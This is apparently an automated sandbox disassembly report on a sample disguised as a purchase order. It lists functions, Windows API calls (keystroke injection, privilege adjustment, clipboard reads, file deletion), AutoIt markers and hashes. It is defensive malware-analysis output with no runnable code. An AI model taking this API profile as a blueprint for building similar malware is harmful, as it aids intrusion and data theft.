                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 00AFF956
                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00AFF967
                      • SetCapture.USER32(?), ref: 00AFF970
                      • ClientToScreen.USER32(?,?), ref: 00AFF9D4
                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00AFF9E0
                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 00AFF9FA
                      • ReleaseCapture.USER32 ref: 00AFFA05
                      • GetCursorPos.USER32(?), ref: 00AFFA3A
                      • ScreenToClient.USER32(?,?), ref: 00AFFA47
                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00AFFAA9
                      • SendMessageW.USER32 ref: 00AFFAD3
                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00AFFB12
                      • SendMessageW.USER32 ref: 00AFFB3D
                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00AFFB55
                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00AFFB60
                      • GetCursorPos.USER32(?), ref: 00AFFB81
                      • ScreenToClient.USER32(?,?), ref: 00AFFB8E
                      • GetParent.USER32(?), ref: 00AFFBAA
                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00AFFC10
                      • SendMessageW.USER32 ref: 00AFFC40
                      • ClientToScreen.USER32(?,?), ref: 00AFFC96
                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00AFFCC2
                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00AFFCEA
                      • SendMessageW.USER32 ref: 00AFFD0D
                      • ClientToScreen.USER32(?,?), ref: 00AFFD57
                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00AFFD87
                      • GetWindowLongW.USER32(?,000000F0), ref: 00AFFE1C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                      • String ID: @GUI_DRAGID$F
                      • API String ID: 2516578528-4164748364
                      • Opcode ID: 2bb4f5b427a0a5136f6219820cf4b4f36bb5e30e75a1451ec0a7ad8d06b11b8a
                      • Instruction ID: 0df5e306ad6e5dbfba7058098c860b69a8b00d15fa49a666187f4d52f9ad6e91
                      • Opcode Fuzzy Hash: 2bb4f5b427a0a5136f6219820cf4b4f36bb5e30e75a1451ec0a7ad8d06b11b8a
                      • Instruction Fuzzy Hash: 8C329971204249AFDB60DFA8C884ABABBE5BF48358F144A69F695C72B1DB31DC04CB51
                      Function 00AFA8DC Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00AFAFDB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: MessageSend
                      • String ID: %d/%02d/%02d
                      • API String ID: 3850602802-328681919
                      • Opcode ID: 913991eefe13b29060213cffd5158a402a38559db355056abb691f445f0a12e1
                      • Instruction ID: 609777e4d54445439488a9beb1d5ef74367312d5abc2e503c4697acf5166bbed
                      • Opcode Fuzzy Hash: 913991eefe13b29060213cffd5158a402a38559db355056abb691f445f0a12e1
                      • Instruction Fuzzy Hash: 2812B0B1500218ABEB259FA8CD89FFEBBB8EF55350F108259F619DB2D1DB708941CB11
                      Function 00AAF78E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                      Download Yara Rule
                      APIs
                      • GetForegroundWindow.USER32(00000000,00000000), ref: 00AAF796
                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B04388
                      • IsIconic.USER32(000000FF), ref: 00B04391
                      • ShowWindow.USER32(000000FF,00000009), ref: 00B0439E
                      • SetForegroundWindow.USER32(000000FF), ref: 00B043A8
                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B043BE
                      • GetCurrentThreadId.KERNEL32 ref: 00B043C5
                      • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00B043D1
                      • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00B043E2
                      • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00B043EA
                      • AttachThreadInput.USER32(00000000,?,00000001), ref: 00B043F2
                      • SetForegroundWindow.USER32(000000FF), ref: 00B043F5
                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B0440A
                      • keybd_event.USER32(00000012,00000000), ref: 00B04415
                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B0441F
                      • keybd_event.USER32(00000012,00000000), ref: 00B04424
                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B0442D
                      • keybd_event.USER32(00000012,00000000), ref: 00B04432
                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B0443C
                      • keybd_event.USER32(00000012,00000000), ref: 00B04441
                      • SetForegroundWindow.USER32(000000FF), ref: 00B04444
                      • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00B0446B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                      • String ID: Shell_TrayWnd
                      • API String ID: 4125248594-2988720461
                      • Opcode ID: 00b60608bbd6ae1291028bc28628e8844395015f81c2961f0750129bbb77d9c8
                      • Instruction ID: 2d1a782e988c28bfca2bac885cd34e033e805112be966af278ccbb859459f280
                      • Opcode Fuzzy Hash: 00b60608bbd6ae1291028bc28628e8844395015f81c2961f0750129bbb77d9c8
                      • Instruction Fuzzy Hash: 4A3176B1A40218BFEB215B719C49FBF7EADEB44B50F518065FB05E71D1CBB05D01AAA0
                      Function 00A9BDF0 Relevance: 35.6, APIs: 12, Strings: 8, Instructions: 643COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                      • GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,00B522E8,?,00000000,?,00A93E2E,?,00000000,?,00B2DBF0,00000000,?), ref: 00A9BE8B
                      • GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00A93E2E,?,00000000,?,00B2DBF0,00000000,?,00000002), ref: 00A9BEA7
                      • __wsplitpath.LIBCMT ref: 00A9BF19
                        • Part of subcall function 00AB297D: __wsplitpath_helper.LIBCMT ref: 00AB29BD
                      • _wcscpy.LIBCMT ref: 00A9BF31
                      • _wcscat.LIBCMT ref: 00A9BF46
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00A9BF56
                      • _wcscpy.LIBCMT ref: 00A9C03E
                      • _wcscpy.LIBCMT ref: 00A9C1ED
                      • SetCurrentDirectoryW.KERNEL32 ref: 00A9C250
                        • Part of subcall function 00AB010A: std::exception::exception.LIBCMT ref: 00AB013E
                        • Part of subcall function 00AB010A: __CxxThrowException@8.LIBCMT ref: 00AB0153
                        • Part of subcall function 00A9C320: _memmove.LIBCMT ref: 00A9C419
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CurrentDirectory_wcscpy$_memmove$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_wcscatstd::exception::exception
                      • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string$_
                      • API String ID: 2542276039-689609797
                      • Opcode ID: 7de5dfb15542450c9f9e60c820c5bc45306a077317ee02e3ebabff99b52f0ef0
                      • Instruction ID: 35bbb3459e633bf7a3d3205d7574314882eddf2d98698cb49670999aa002243e
                      • Opcode Fuzzy Hash: 7de5dfb15542450c9f9e60c820c5bc45306a077317ee02e3ebabff99b52f0ef0
                      • Instruction Fuzzy Hash: 0C42B4716083419FCB10EF60D945BEBB7E8AF94310F04492DF58687292EB31EA49CB93
                      Function 00ACB9F1 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 223COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00ACBEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00ACBF0F
                        • Part of subcall function 00ACBEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00ACBF3C
                        • Part of subcall function 00ACBEC3: GetLastError.KERNEL32 ref: 00ACBF49
                      • _memset.LIBCMT ref: 00ACBA34
                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00ACBA86
                      • CloseHandle.KERNEL32(?), ref: 00ACBA97
                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00ACBAAE
                      • GetProcessWindowStation.USER32 ref: 00ACBAC7
                      • SetProcessWindowStation.USER32(00000000), ref: 00ACBAD1
                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00ACBAEB
                        • Part of subcall function 00ACB8B0: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00ACB9EC), ref: 00ACB8C5
                        • Part of subcall function 00ACB8B0: CloseHandle.KERNEL32(?,?,00ACB9EC), ref: 00ACB8D7
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                      • String ID: $default$winsta0
                      • API String ID: 2063423040-1027155976
                      • Opcode ID: 8ede6f1702c6be6665d71cff0fcb8b462c5fbb9a52b886d490084a985af1aab8
                      • Instruction ID: abb6183ecf8f46fc221a0bd135178e23c83986eb2e00540522eb9238213b2a08
                      • Opcode Fuzzy Hash: 8ede6f1702c6be6665d71cff0fcb8b462c5fbb9a52b886d490084a985af1aab8
                      • Instruction Fuzzy Hash: 9D815771910208AFDF11DFA4CD46EEEBBB8EF08304F158559F915A62A1DB328E14EB21
                      Function 00AD6B3F Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 164filestringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00A931B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00A931DA
                        • Part of subcall function 00AD7B9F: __wsplitpath.LIBCMT ref: 00AD7BBC
                        • Part of subcall function 00AD7B9F: __wsplitpath.LIBCMT ref: 00AD7BCF
                        • Part of subcall function 00AD7C0C: GetFileAttributesW.KERNEL32(?,00AD6A7B), ref: 00AD7C0D
                      • _wcscat.LIBCMT ref: 00AD6B9D
                      • _wcscat.LIBCMT ref: 00AD6BBB
                      • __wsplitpath.LIBCMT ref: 00AD6BE2
                      • FindFirstFileW.KERNEL32(?,?), ref: 00AD6BF8
                      • _wcscpy.LIBCMT ref: 00AD6C57
                      • _wcscat.LIBCMT ref: 00AD6C6A
                      • _wcscat.LIBCMT ref: 00AD6C7D
                      • lstrcmpiW.KERNEL32(?,?), ref: 00AD6CAB
                      • DeleteFileW.KERNEL32(?), ref: 00AD6CBC
                      • MoveFileW.KERNEL32(?,?), ref: 00AD6CDB
                      • MoveFileW.KERNEL32(?,?), ref: 00AD6CEA
                      • CopyFileW.KERNEL32(?,?,00000000), ref: 00AD6CFF
                      • DeleteFileW.KERNEL32(?), ref: 00AD6D10
                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00AD6D37
                      • FindClose.KERNEL32(00000000), ref: 00AD6D53
                      • FindClose.KERNEL32(00000000), ref: 00AD6D61
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteMove$AttributesCopyFirstFullNameNextPath_wcscpylstrcmpi
                      • String ID: \*.*
                      • API String ID: 1867810238-1173974218
                      • Opcode ID: 902db575d01b9e229450fb8298f3b162399f0327cc700b74e89be836c6a8f128
                      • Instruction ID: 59aa6018f2bfab1e28abb5c3a7cb85b5e9539738d225ef7a8eb3a38953775abc
                      • Opcode Fuzzy Hash: 902db575d01b9e229450fb8298f3b162399f0327cc700b74e89be836c6a8f128
                      • Instruction Fuzzy Hash: C9512E7290416CAACF21EBA0DD84EEE77BDAF09300F4445D7E55AA3141EB349B88CF61
                      Function 00AE7099 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                      Download Yara Rule
                      APIs
                      • OpenClipboard.USER32(00B2DBF0), ref: 00AE70C3
                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 00AE70D1
                      • GetClipboardData.USER32(0000000D), ref: 00AE70D9
                      • CloseClipboard.USER32 ref: 00AE70E5
                      • GlobalLock.KERNEL32(00000000), ref: 00AE7101
                      • CloseClipboard.USER32 ref: 00AE710B
                      • GlobalUnlock.KERNEL32(00000000), ref: 00AE7120
                      • IsClipboardFormatAvailable.USER32(00000001), ref: 00AE712D
                      • GetClipboardData.USER32(00000001), ref: 00AE7135
                      • GlobalLock.KERNEL32(00000000), ref: 00AE7142
                      • GlobalUnlock.KERNEL32(00000000), ref: 00AE7176
                      • CloseClipboard.USER32 ref: 00AE7283
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                      • String ID:
                      • API String ID: 3222323430-0
                      • Opcode ID: cd373461e3b934fe31be99e5ffcab27677d50cf702e951a8cfd5a915f4cd54e1
                      • Instruction ID: aa91d5ae53409cdc6c0b3f521751c0e372170369b8f95bb4c41029444cb1b083
                      • Opcode Fuzzy Hash: cd373461e3b934fe31be99e5ffcab27677d50cf702e951a8cfd5a915f4cd54e1
                      • Instruction Fuzzy Hash: 4351C031308341ABD711EB65DD9AFAE77E8AF84B01F808619F646D72E1DF70D9048B62
                      Function 00ADFDD2 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON
                      Download Yara Rule
                      APIs
                      • FindFirstFileW.KERNEL32(?,?), ref: 00ADFE03
                      • FindClose.KERNEL32(00000000), ref: 00ADFE57
                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00ADFE7C
                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00ADFE93
                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00ADFEBA
                      • __swprintf.LIBCMT ref: 00ADFF06
                      • __swprintf.LIBCMT ref: 00ADFF3F
                        • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                      • __swprintf.LIBCMT ref: 00ADFF93
                        • Part of subcall function 00AB234B: __woutput_l.LIBCMT ref: 00AB23A4
                      • __swprintf.LIBCMT ref: 00ADFFE1
                      • __swprintf.LIBCMT ref: 00AE0030
                      • __swprintf.LIBCMT ref: 00AE007F
                      • __swprintf.LIBCMT ref: 00AE00CE
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l_memmove
                      • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                      • API String ID: 108614129-2428617273
                      • Opcode ID: 82ac06b533d3293fedf722362d2b0680ad96358255155d54f65fe1486f717d65
                      • Instruction ID: 4d2ec96668ab45ea1c3b49d7e2e78d58eabb8711183f69dc266d27e1f843cf02
                      • Opcode Fuzzy Hash: 82ac06b533d3293fedf722362d2b0680ad96358255155d54f65fe1486f717d65
                      • Instruction Fuzzy Hash: 8BA13FB2508344ABC700EBA4C985EAFB7EDBF95700F44491EF595C7191EB34EA48CB62
                      Function 00AE2044 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON
                      Download Yara Rule
                      APIs
                      • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00AE2065
                      • _wcscmp.LIBCMT ref: 00AE207A
                      • _wcscmp.LIBCMT ref: 00AE2091
                      • GetFileAttributesW.KERNEL32(?), ref: 00AE20A3
                      • SetFileAttributesW.KERNEL32(?,?), ref: 00AE20BD
                      • FindNextFileW.KERNEL32(00000000,?), ref: 00AE20D5
                      • FindClose.KERNEL32(00000000), ref: 00AE20E0
                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00AE20FC
                      • _wcscmp.LIBCMT ref: 00AE2123
                      • _wcscmp.LIBCMT ref: 00AE213A
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00AE214C
                      • SetCurrentDirectoryW.KERNEL32(00B43A68), ref: 00AE216A
                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00AE2174
                      • FindClose.KERNEL32(00000000), ref: 00AE2181
                      • FindClose.KERNEL32(00000000), ref: 00AE2191
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                      • String ID: *.*
                      • API String ID: 1803514871-438819550
                      • Opcode ID: bcec125a33148d231eded3a31e574f8765a69d55050f8579ac2b6ec997b3e25a
                      • Instruction ID: 5745a4249fadd4a0d13c7b0e7139a50c3f98ffa3c15d6aaec052ff712462006d
                      • Opcode Fuzzy Hash: bcec125a33148d231eded3a31e574f8765a69d55050f8579ac2b6ec997b3e25a
                      • Instruction Fuzzy Hash: 0A31AE329402597ACB14ABA5EC49FDE73EC9F09320F1441A6EA15E30A0EB74DF84CB65
                      Function 00AE219F Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON
                      Download Yara Rule
                      APIs
                      • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00AE21C0
                      • _wcscmp.LIBCMT ref: 00AE21D5
                      • _wcscmp.LIBCMT ref: 00AE21EC
                        • Part of subcall function 00AD7606: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00AD7621
                      • FindNextFileW.KERNEL32(00000000,?), ref: 00AE221B
                      • FindClose.KERNEL32(00000000), ref: 00AE2226
                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00AE2242
                      • _wcscmp.LIBCMT ref: 00AE2269
                      • _wcscmp.LIBCMT ref: 00AE2280
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00AE2292
                      • SetCurrentDirectoryW.KERNEL32(00B43A68), ref: 00AE22B0
                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00AE22BA
                      • FindClose.KERNEL32(00000000), ref: 00AE22C7
                      • FindClose.KERNEL32(00000000), ref: 00AE22D7
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                      • String ID: *.*
                      • API String ID: 1824444939-438819550
                      • Opcode ID: 84689245723bb0a234f7c99949876c75006601f7e68c308f23e066a2665d71a3
                      • Instruction ID: c7285e6a14b7abf97427890d28f3d64eba094e379254f25baf71c582e673bf88
                      • Opcode Fuzzy Hash: 84689245723bb0a234f7c99949876c75006601f7e68c308f23e066a2665d71a3
                      • Instruction Fuzzy Hash: 1D31D2329412597ACF14EBA5EC49FDE77AC9F45320F144191EA14E30A0EB70DF85CB69
                      Function 00A96BBC Relevance: 21.9, APIs: 5, Strings: 7, Instructions: 891COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: _memmove_memset
                      • String ID: Q\E$[$\$\$\$]$^
                      • API String ID: 3555123492-286096704
                      • Opcode ID: 9a761e2e822ae448cc74ed7bae01abc95fed227455c09af879a50469da0747b9
                      • Instruction ID: 88c73111549513fce939439f41c4932c0316cfd881ef2dc0416e20eb4d3d9996
                      • Opcode Fuzzy Hash: 9a761e2e822ae448cc74ed7bae01abc95fed227455c09af879a50469da0747b9
                      • Instruction Fuzzy Hash: E472AC71E14219DBDF28CF98C9806EDB7F1FF48314F2481A9D855AB281E774AE81DB90
                      Function 00ACB398 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00ACB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00ACB903
                        • Part of subcall function 00ACB8E7: GetLastError.KERNEL32(?,00ACB3CB,?,?,?), ref: 00ACB90D
                        • Part of subcall function 00ACB8E7: GetProcessHeap.KERNEL32(00000008,?,?,00ACB3CB,?,?,?), ref: 00ACB91C
                        • Part of subcall function 00ACB8E7: HeapAlloc.KERNEL32(00000000,?,00ACB3CB,?,?,?), ref: 00ACB923
                        • Part of subcall function 00ACB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00ACB93A
                        • Part of subcall function 00ACB982: GetProcessHeap.KERNEL32(00000008,00ACB3E1,00000000,00000000,?,00ACB3E1,?), ref: 00ACB98E
                        • Part of subcall function 00ACB982: HeapAlloc.KERNEL32(00000000,?,00ACB3E1,?), ref: 00ACB995
                        • Part of subcall function 00ACB982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00ACB3E1,?), ref: 00ACB9A6
                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00ACB3FC
                      • _memset.LIBCMT ref: 00ACB411
                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00ACB430
                      • GetLengthSid.ADVAPI32(?), ref: 00ACB441
                      • GetAce.ADVAPI32(?,00000000,?), ref: 00ACB47E
